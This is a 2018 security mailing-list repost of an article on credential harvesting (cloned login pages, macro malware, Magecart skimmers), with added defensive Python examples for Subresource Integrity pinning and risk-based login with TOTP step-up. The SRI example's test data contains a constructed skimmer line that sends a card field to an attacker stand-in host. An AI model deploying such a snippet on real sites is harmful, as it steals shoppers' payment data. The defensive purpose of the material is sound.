[BreachExchange] The Foundation of Cyber-Attacks: Credential Harvesting

Destry Winant destry at riskbasedsecurity.com
Wed Jul 25 22:28:34 EDT 2018


https://www.securityweek.com/foundation-cyber-attacks-credential-harvesting

Recent reports of a newly detected Smoke Loader infection campaign and
the re-emergence of Magecart-based cyber-attacks illustrate a common
tactic used by cyber criminals and state-sponsored attackers alike:
credential harvesting. According to the Verizon 2017 Data Breach
Investigations Report, 81% of hacking-related breaches leverage either
stolen, default, or weak credentials. Credential harvesting is often
equated with phishing, but phishing is only one of several tactics used
to obtain credentials.

Cyber attackers long ago figured out that the easiest way for them to
gain access to sensitive data is by compromising an end user’s
identity and credentials. Betting on the human factor and attacking
the weakest link in the cyber defense chain, credential harvesting has
become the foundation of most cyber-attacks.

Credential harvesting is widely used by attackers, but what they do
with the stolen information varies greatly. In some cases the
credentials are used for subsequent attacks whose goal is to gain
access to systems or network resources; in others they are monetized
directly, by taking over bank accounts or simply by selling the
information on the Darknet.

Both consumers and business users need to understand that credential
harvesting comes in multiple flavors and combinations and is not
always tied to email phishing. In general, cyber adversaries
leverage social engineering techniques, malware, digital skimmers, or
any combination thereof to steal credentials. Most users are familiar
with phishing emails that contain links to cloned websites, or
weaponized attachments that install malware on the victim's computer.

In the case of cloned websites, the victim is often unaware of the
attack, since the cloned page is usually visually indistinguishable
from the real one. When the user enters his or her credentials, the
page captures them and then forwards them to the genuine login page,
which logs the user in as normal. The victim never learns that their
credentials were stolen. In other cases, like the recent Smoke Loader
infection campaign, the attack begins with phishing emails that carry
a weaponized Word document. When the user opens the file and enables
its macro, the macro downloads malware that subsequently harvests the
user's credentials.

The latest technique being used for credential harvesting is the
digital skimmer. While skimming was originally applied to ATMs,
threat groups like Magecart have perfected its use for the digital
world. By injecting scripts into commonly used Web tools such as cloud
analytics plug-ins, content management systems, and online support
snippets, cyber criminals can steal data that is entered into online
payment forms or login pages on eCommerce sites.

One such attack targeted a global online ticket sales company and made
headlines just a few weeks ago. According to the security researchers
that detected the attack, more than 800 other websites were impacted
by Magecart campaigns. Magecart actors continue to evolve their
approach and are now compromising third-party tools rather than
injecting JavaScript into individual websites. Because one compromised
tool is loaded by every site that embeds it, a single injection now
harvests far more credentials than in the past.
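The skimmer scenario above works because the victim site runs whatever bytes the third-party host serves. One control a site can apply is Subresource Integrity (SRI): pin the hash of the script you reviewed in the <script> tag, and the browser refuses to execute a version whose content differs. The following is an added example, not code from the article or from any vendor; the script bodies, the skimmer snippet and the URL are constructed stand-ins. It computes the integrity attribute and mirrors the browser-side check to show that an appended skimmer fails it.

```python
"""Subresource Integrity (SRI) pinning for a third-party script (added example).

The two script bodies below are constructed for illustration, not real vendor
code: ORIGINAL_SCRIPT is what we reviewed, TAMPERED_SCRIPT is the same file
after a skimmer was appended at the vendor's end.
"""
import base64
import hashlib

ORIGINAL_SCRIPT = b"window.analytics = {track: function (e) { /* ... */ }};\n"

# Constructed skimmer: exfiltrates a card field on form submit.
SKIMMER = (b"document.querySelector('form').addEventListener('submit', function () {"
           b" new Image().src = 'https://attacker.invalid/c?d=' +"
           b" encodeURIComponent(document.querySelector('#cc').value); });\n")
TAMPERED_SCRIPT = ORIGINAL_SCRIPT + SKIMMER

# SRI permits exactly these digest algorithms; larger number = stronger.
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Value for an HTML integrity= attribute: "<algo>-<base64 raw digest>"."""
    if algo not in STRENGTH:
        raise ValueError("SRI allows only sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """The <script> tag a site should emit for a pinned third-party script.
    crossorigin="anonymous" is required for SRI to apply to cross-origin loads."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def sri_allows(integrity: str, fetched: bytes) -> bool:
    """Mirror the browser's decision for an integrity attribute.

    The attribute may list several space-separated hashes (e.g. during a
    vendor rollover). Per the SRI spec, only the strongest algorithm present
    is considered, any matching hash at that strength passes, unrecognised
    tokens are ignored, and an attribute with no usable token does not block
    the load at all, so an empty or malformed attribute protects nothing.
    """
    tokens = [t for t in integrity.split() if t.partition("-")[0] in STRENGTH]
    if not tokens:
        return True
    strongest = max(STRENGTH[t.partition("-")[0]] for t in tokens)
    return any(sri_hash(fetched, t.partition("-")[0]) == t
               for t in tokens if STRENGTH[t.partition("-")[0]] == strongest)


if __name__ == "__main__":
    pinned = sri_hash(ORIGINAL_SCRIPT)
    print(script_tag("https://cdn.example.invalid/analytics.js", ORIGINAL_SCRIPT))
    print("original allowed:", sri_allows(pinned, ORIGINAL_SCRIPT))
    print("tampered allowed:", sri_allows(pinned, TAMPERED_SCRIPT))
```

The trade-off is the one the article raises under risk mitigation: SRI only works for scripts whose content is fixed, so a vendor that ships a constantly changing loader cannot be pinned this way and should instead be kept off payment and login pages altogether.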

Risk Mitigation

So what steps can consumers and businesses take to minimize the risk
of falling victim to these credential harvesting campaigns? Here are a
few fundamental steps to take:

● Anti-Phishing Training: Educating users ― be it consumers or
corporate ― about the risk of phishing and the characteristics of
these attacks is an essential first step.

● Limit Use of Third-Party Web Scripts / Plug-Ins: Exercise caution
when deploying third-party Web tools. Review the vendor's security
practices before deploying a tool, and keep the number of external
scripts that run on payment and login pages to a minimum, since every
one of them is a potential injection point. Obviously, restricting the
use of third-party Web tools must balance security with providing a
differentiated customer experience.

● Multi-Factor Authentication (MFA): Since MFA requires two or more
independent factors (something you know, something you have,
something you are), a stolen password alone is no longer enough to
log in, which makes it one of the best ways to prevent unauthorized
users from accessing sensitive data and moving laterally within the
network. Thus, it should be standard practice for all organizations.
Note that the forwarding clone pages described above can relay a
one-time code to the genuine site just as they relay the password, so
MFA reduces the risk rather than eliminating it.

● Risk-Based Access Control: Risk-based access uses analytics, often
machine learning, over user behavior to decide how much to trust each
login attempt. Through a combination of analytics, user profiles, and
policy enforcement, access decisions can be made in real time: ease
low-risk access, step up authentication when risk is higher, or block
access entirely. Risk-based access control is often used in
combination with MFA, with the second factor demanded only for the
higher-risk attempts.
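The MFA and risk-based access items above describe one decision flow: score the attempt, allow it when the score is low, demand a second factor when it is moderate, and block when it is high. The following added example (not code from the article or from any product) implements that flow end to end. The rules, weights, thresholds and login events are constructed for illustration; a real deployment would learn the weights from behavioural data. The second factor is a TOTP (RFC 6238, HMAC-SHA1, 30-second step, 6 digits), which is the "something you have" most readers will recognise from authenticator apps.

```python
"""Risk-based access with TOTP step-up (added example, constructed rules)."""
import hashlib
import hmac
import struct
import time
from dataclasses import dataclass, field
from typing import Optional

STEP_UP = 30   # constructed threshold: at or above this, demand a second factor
BLOCK = 80     # constructed threshold: at or above this, deny outright


@dataclass
class LoginEvent:
    user: str
    ip_country: str
    device_id: str
    hour_utc: int
    failed_attempts_last_hour: int = 0


@dataclass
class UserProfile:
    known_devices: set = field(default_factory=set)
    usual_countries: set = field(default_factory=set)
    usual_hours: range = range(7, 20)      # 07:00-19:59 UTC


def risk_score(event: LoginEvent, profile: UserProfile) -> int:
    """Sum constructed rule weights. Each rule stands in for a signal an
    analytics engine would normally learn rather than hard-code."""
    score = 0
    if event.device_id not in profile.known_devices:
        score += 35                         # unrecognised device
    if event.ip_country not in profile.usual_countries:
        score += 35                         # unusual geography
    if event.hour_utc not in profile.usual_hours:
        score += 15                         # outside the user's normal hours
    if event.failed_attempts_last_hour >= 5:
        score += 40                         # looks like credential stuffing
    return score


def decide(score: int) -> str:
    if score >= BLOCK:
        return "block"
    if score >= STEP_UP:
        return "step_up"
    return "allow"


def totp(secret: bytes, for_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP (RFC 4226) over the number of steps since the epoch."""
    counter = struct.pack(">Q", for_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                 # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def verify_totp(secret: bytes, submitted: str, now: int, window: int = 1) -> bool:
    """Accept the current 30-second step and +/- `window` neighbours to
    tolerate clock drift; compare in constant time."""
    return any(hmac.compare_digest(totp(secret, now + delta * 30), submitted)
               for delta in range(-window, window + 1))


def authorize(event: LoginEvent, profile: UserProfile, secret: bytes,
              submitted_code: Optional[str] = None,
              now: Optional[int] = None) -> str:
    """Decision for an attempt whose password already checked out upstream.
    Returns "allow", "block", or "step_up" (prompt the user for a code)."""
    decision = decide(risk_score(event, profile))
    if decision != "step_up":
        return decision
    if submitted_code is None:
        return "step_up"
    now = int(time.time()) if now is None else now
    return "allow" if verify_totp(secret, submitted_code, now) else "block"


if __name__ == "__main__":
    profile = UserProfile(known_devices={"laptop-1"}, usual_countries={"DE"})
    secret = b"12345678901234567890"       # RFC 6238 test-vector secret, not a real key
    usual = LoginEvent("alice", "DE", "laptop-1", 10)
    new_device = LoginEvent("alice", "DE", "phone-9", 10)
    print("usual device:", authorize(usual, profile, secret))
    print("new device, no code:", authorize(new_device, profile, secret))
    print("new device, code:", authorize(new_device, profile, secret,
                                         totp(secret, 59), now=59))
```

The point the article makes about stolen passwords shows up in the numbers: an attacker replaying a harvested password from an unknown device in an unusual country scores 70, lands in the step-up band, and is stopped by the second factor; only a password-only policy would have let that attempt through.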

Stealing a valid credential and using it to access a network is
easier, less risky, and ultimately more efficient than exploiting a
vulnerability, even a zero-day. Cyber security defenses need to adapt
to this fact. User education and strengthening an organization's
authentication systems are two essential steps that can minimize the
risks associated with credential harvesting and the subsequent
cyber-attacks aimed at data exfiltration.

